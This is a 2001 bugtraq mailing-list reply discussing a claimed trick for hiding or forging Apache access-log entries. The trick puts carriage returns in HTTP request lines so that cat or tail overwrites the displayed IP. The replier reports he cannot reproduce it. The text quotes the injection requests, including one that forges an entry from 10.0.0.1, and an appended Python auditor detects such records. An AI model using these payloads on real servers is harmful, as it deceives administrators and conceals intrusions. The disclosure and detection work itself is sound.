[22992] in bugtraq
Re: Hidden requests to Apache
daemon@ATHENA.MIT.EDU (Rasmus Bøg Hansen)
Thu Oct 25 10:58:12 2001
Date: Thu, 25 Oct 2001 08:00:51 +0200 (CEST)
From: Rasmus Bøg Hansen <moffe@amagerkollegiet.dk>
To: smiler <smiler@vxd.org>
Cc: <bugtraq@securityfocus.com>, <submissions@packetstormsecurity.org>
In-Reply-To: <LEEPKOFKPCPHJMIIKFGJEENLCBAA.smiler@vxd.org>
Message-ID: <Pine.LNX.4.33.0110250755040.1491-100000@grignard.amagerkollegiet.dk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
On Wed, 24 Oct 2001, smiler wrote:
> It's possible to "cheat" an Apache SysAdministrator and make him think that
> his server didn't log an HTTP request or make him think that a request has
> been made by another IP address.
> This "cheating" is only valid when the log is displayed on the screen using
> common Unix utils such as cat, tail, grep, etc...
> This will not work with the kind of sysadmin that edits the logs using vi or
> even prints them to read at night in bed eh eh :-)
> I am not sure if this can be considered as a bug or as a feature (?) but in
> any case it will surely lead Apache sysadmins into mistakes !!
I cannot reproduce this on RedHat Linux 7.0, apache 1.3.19.
> ----------Technique----------
>
> To make a request and to make it seem like it came from NO IP ADDRESS at
> all, the request should be made as this :
>
> GET / HTTP/1.0 \r\r\n
>
> In this case APACHE will print in the log file the carriage return
> character. So when we try to tail the access_log file it will be shown in
> the screen as :
>
> " 414 3461.251 - - [24/Oct/2001:18:58:18 +0100] "GET / HTTP/1.0
GET / HTTP/1.0 \r\r\n
gives this log entry:
194.182.238.30 - - [25/Oct/2001:07:54:01 +0200] "GET / HTTP/1.0 \r\r\n"
200 510 "-" "-"
> A normal line would be :
>
> 127.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0" 200 164
>
> The normal line output will help us to understand that what happens is cat
> made a carriage return after the HTTP/1.0 and printed the rest of the log
> over the IP address field.
> We can also make it look like the request came from another IP address, and
> this is preferable because like this the SysAdmin will see no apparent
> strange behaviour in the logfile. Just be careful with the timestamp !!
> So the request should be :
>
> GET / HTTP/1.0 \r10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET /
> HTTP/1.0\r\n
>
> And the logfile will appear like this :
>
> 10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0" 200 164
The above gives this log entry:
194.182.238.3 - - [25/Oct/2001:07:56:41 +0200] "GET / HTTP/1.0
\r10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0\r\n" 200 510
"-" "-"
Rasmus
--
-- [ Rasmus 'Møffe' Bøg Hansen ] ---------------------------------------
I haven't lost my mind;
I have backed it up on tape somewhere........
--------------------------------- [ moffe at amagerkollegiet dot dk ] --
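An added example for the defender's side of this thread (not code from either poster): a small Python auditor that renders access-log records with control characters escaped, so a CR or LF inside the request field cannot overwrite or split the displayed line the way cat/tail would show it, and that flags records whose request field is malformed or embeds something shaped like a second log record. It assumes the Common/Combined Log Format seen in the quoted entries and that the log writer stores the request line raw, as the quoted output shows; the sample records are constructed from the entries in the message.

```python
"""Audit Apache access-log records for control characters that can fool a
terminal (cat, tail, grep) into displaying a hidden or forged entry."""
import re

# Bytes that can rewrite the terminal line or split one record into two:
# CR (0x0d) returns the cursor to column 0, LF (0x0a) fakes a new record,
# BS (0x08) erases, ESC (0x1b) starts terminal control sequences.
CONTROL_RE = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")

# Common/Combined Log Format. DOTALL so an injected CR/LF inside the quoted
# request field is still captured as part of that field rather than ending it.
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\Z',
    re.DOTALL,
)

# A well-formed request line: METHOD SP target SP HTTP/x.y and nothing else.
REQUEST_RE = re.compile(r"^[A-Z]+ \S+ HTTP/\d\.\d\Z")

# Something inside the request field that itself looks like the start of a
# log record ("host ident user [time] \""), i.e. a forged entry meant to be
# read as a real one once the CR has moved the cursor back to column 0.
FORGED_RECORD_RE = re.compile(r'\S+ \S+ \S+ \[[^\]]+\] "')


def escape_controls(text):
    """Render control characters visibly (\\r, \\n, \\xHH) so the terminal
    cannot be tricked into overwriting or splitting the line."""
    def repl(match):
        ch = match.group(0)
        return {"\r": "\\r", "\n": "\\n"}.get(ch, "\\x%02x" % ord(ch))
    return CONTROL_RE.sub(repl, text)


def audit_line(record):
    """Return (suspicious, reasons, safe_rendering) for one log record.

    Caveat when reading a real file: open it with newline='' (or in binary
    and decode), because Python's default text mode translates a lone CR
    into LF, and str.splitlines() also treats a lone CR as a record boundary.
    A raw LF that Apache wrote inside the request field will already have
    split the record in the file; both halves then fail this audit.
    """
    reasons = []
    if CONTROL_RE.search(record):
        reasons.append("control characters present")
    match = CLF_RE.match(record)
    if match is None:
        reasons.append("line does not parse as a CLF record")
    else:
        request = match.group("request")
        if not REQUEST_RE.match(request):
            reasons.append("malformed request line")
        if FORGED_RECORD_RE.search(request):
            reasons.append("request field embeds a log-record-like string")
    return bool(reasons), reasons, escape_controls(record)


def audit_log(records):
    """Audit a list of records; return (line_no, reasons, rendering) for the
    suspicious ones only, with control characters already escaped."""
    findings = []
    for line_no, record in enumerate(records, 1):
        suspicious, reasons, rendered = audit_line(record)
        if suspicious:
            findings.append((line_no, reasons, rendered))
    return findings


# Constructed sample records modelled on the entries in the thread: one clean
# entry, one carrying the bare CR CR LF trick, and one where a CR is followed
# by a forged record claiming to come from 10.0.0.1.
SAMPLE_LOG = [
    '127.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0" 200 164 "-" "-"',
    '194.182.238.30 - - [25/Oct/2001:07:54:01 +0200] "GET / HTTP/1.0 \r\r\n"'
    ' 200 510 "-" "-"',
    '194.182.238.3 - - [25/Oct/2001:07:56:41 +0200] "GET / HTTP/1.0 \r'
    '10.0.0.1 - - [24/Oct/2001:19:00:32 +0100] "GET / HTTP/1.0\r\n" 200 510 "-" "-"',
]

if __name__ == "__main__":
    for line_no, reasons, rendered in audit_log(SAMPLE_LOG):
        print("line %d: %s" % (line_no, "; ".join(reasons)))
        print("    " + rendered)
```

Running the block prints the two injected records with their CRs shown as `\r`, so the forged `10.0.0.1` entry is visibly part of the `194.182.238.3` request field instead of replacing it on screen. Piping a live log through `escape_controls` before `tail` or `grep` gives the same protection for interactive viewing.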